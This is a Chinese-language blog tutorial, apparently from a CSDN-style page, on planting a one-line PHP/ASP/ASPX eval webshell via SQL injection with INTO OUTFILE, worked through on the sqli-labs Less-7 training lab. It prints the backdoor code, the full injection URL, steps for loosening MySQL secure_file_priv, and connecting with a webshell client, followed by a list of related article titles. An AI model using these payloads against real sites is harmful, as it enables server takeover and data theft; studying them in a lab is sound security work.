0x00 sql注入之一句话木马

首先介绍一下一句话木马:

一句话木马是一种基于
B/S结构的简短脚本,通过这个脚本,执行POST来的任意参数语句,可以提交任意内容,黑客借此进行SQL注入或拿到SHELL写入大马或截取网站私密信息,达到注入非法信息等的目的。

常见脚本的一句话木马:

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是: <%eval request (“pass”)%>
aspx的一句话是: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>

0x01 注入条件

1.知道网站绝对路径
2,在mysql 中通过命令查看当前状态网站开启secure_file_priv开关需要是打开状态
secure_file_priv的状态有三种可能有三种状态

测试语句:show variables like’%secure%’
1.null 无法写入和读取
2.设置为一个目录名字,只允许在该路径下导入导出。
3.‘’空,可以在任意位置读取和写入


如secure_file_priv结果不为空值,通过修改数据库ini文件加上语句

secure_file_priv= #文件中

[mysqld] secure_file_priv="" #文件尾

0x02 测试注入

这里实验sqli-less-7利用文件上传写入一句话木马并且连接
1)测试后发现闭合状态为?id=1‘)) 字段数为3

2) 检测数据读写权限,打开数据库属于测试语句

show variables like'%secure%'

结果显示为不可读写,通过添加语句secure_file_priv=到数据库ini文件再次重启数据库显示权限已经打开

3)写入php一句话木马到网站关卡文件夹(此处因为已经知道测试环境的绝对地址,故省略地址爆破)


> 数据库下注入语句:select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\shell.php";

url注入语句:http://127.0.0.1/sql1/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["pass"]);?>' into outfile "E:\\phpstudy_pro\\WWW\\sql1\\Less-7\\shell.php"--+

此处文件地址添加两条杠防止被转义

3)使用getshell工具菜刀连接
连接地址

http://192.168.0.104/sqli/Less-7/shell.php
本地:http://127.0.0.1/sqli/Less-7/shell.php

sql注入与一句话木马相关推荐

  1. php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理

    讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子: SELECT * INTO OUTFILE 'C:\ ...

  2. mysql写php木马_PHP一句话木马小总结与SQL语句写一句话木马

    一.基础类的一句话--功能仅限于验证漏洞了,实际中太容易被查出出来: 1 <?php @eval($_GET["code"])?> 2 <?php @system ...

  3. 2021-1-31 pikachu之sql注入

    pikachu之sql注入(初级) 文章目录 pikachu之sql注入(初级) 地位 产生原因 攻击流程 注入点类型 分类 1.数字型注入(post) 2.字符型注入(get) 3.搜索型注入 4. ...

  4. 除了文件上传还有哪些方式可以写一句话木马?

    除了文件上传还有哪些方式可以写一句话木马? 一句话木马如果上传到服务器的话,有啥危害学过网络安全的人都知道.但是通常网上流传的方式都是通过文件上传来实现木马上传,实在太过老套,这里就教大家几个新的方式 ...

  5. WEB渗透之SQL 注入

    SQL 注入 文章目录 SQL 注入 前言 1. SQL 注入分类 2. 按照数据库类型 1. 数据库相关知识 1. MYSQL 1. information_schema 2. 常用的函数 2. 判 ...

  6. [转]数据安全之SQL注入资料整理

    SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉. ...

  7. SQL注入上传一句话木马

    利用sql注入上传一句话木马 导读 1. sql注入的危害 2. 文件写入 2.1 webshell.一句话木马.后门 webshell(大马) 一句话木马 木马文件的危害 2.2 文件写入的前提条件 ...

  8. 后台登录密码绕过+sql注入+一句话木马 实验演示(盾灵)

    环境 Windows Server 2008(虚拟机)   安装phpStudy,安装dunling 盾灵投稿系统 dunling是一个CMS在线内容管理器 dirb是Kali内置的一个基于字典的We ...

  9. 一句话木马SQL注入

    目录 1.搭建靶机环境 (1)实验环境及思路 (2)搭建靶机环境 2.用Navicat构建一句话SQL注入木马 3.通过菜刀连接靶机 1.搭建靶机环境 (1)实验环境及思路 靶机:centos7 以安 ...

最新文章

  1. hive 字符串前有 ’ 符号
  2. ida提取hashab算法记录
  3. 正则表达式,以前总结的,大不分来择自网上
  4. Nginx【学习笔记】
  5. python精确运算_Python:执行精确的浮点数运算
  6. CentOS6.5和RedHat6.5下以rpm方式安装mysql-5.6.20
  7. ASP.NET 2.0 Provider Toolkit
  8. UNITY服务器登录验证设计,Unity游戏登录模块流程(需验证)
  9. 动物老了没生存能力时,它的子女会养育照顾它吗?
  10. 你的优势在哪?开宝马的学渣教会我的事
  11. mysql两个等号是什么运算符_什么是MySQL中的这个运算符=?
  12. SPARC架构下的反汇编(一)——SPARC简介
  13. Android中访问sdcard路径的几种方式
  14. 15、【易混淆概念集】-第九章 职责分配矩阵(RAM) 活动资源估算、资源分解结构 获取资源 资源/项目/自然日历区别 虚拟团队、集中办公、认可与奖励 塔克曼阶梯理论 冲突管理 权力类型
  15. NVIDIA Jetson Nano主机的autoware的学习与demo运行-第1章-操作环境的搭建
  16. 机器学习中的数学基础--随机变量与概率分布,伯努利分布和泊松分布,贝叶斯定理
  17. 当你敲完Hello World后的第一步——C
  18. java 捕捉的异常抛出_Java异常抛出和捕获
  19. 数据库如何防范隐私数据被泄漏
  20. 【视频课】深度学习最有价值的CV领域,30小时掌握目标检测(附作者经历分享)!...

热门文章

  1. halo博客:如何用又拍云搭建加速CDN
  2. TimeSpan的用法
  3. 在Win2003Server上搭建GIT服务器的一些经验。
  4. SQL Server 2000安装教程图解
  5. 零基础springboot一步步走起
  6. linux 用top命令查看系统健康状态
  7. 磁盘柜支持linux,CentOS 5.3 使用iSCSI挂载存储磁盘柜
  8. 再谈CPU使用率100%的问题
  9. Liferay研究之廿九:Liferay5.2基础架构变动收藏
  10. [PHP] strpos stripos strrpos strripos的区别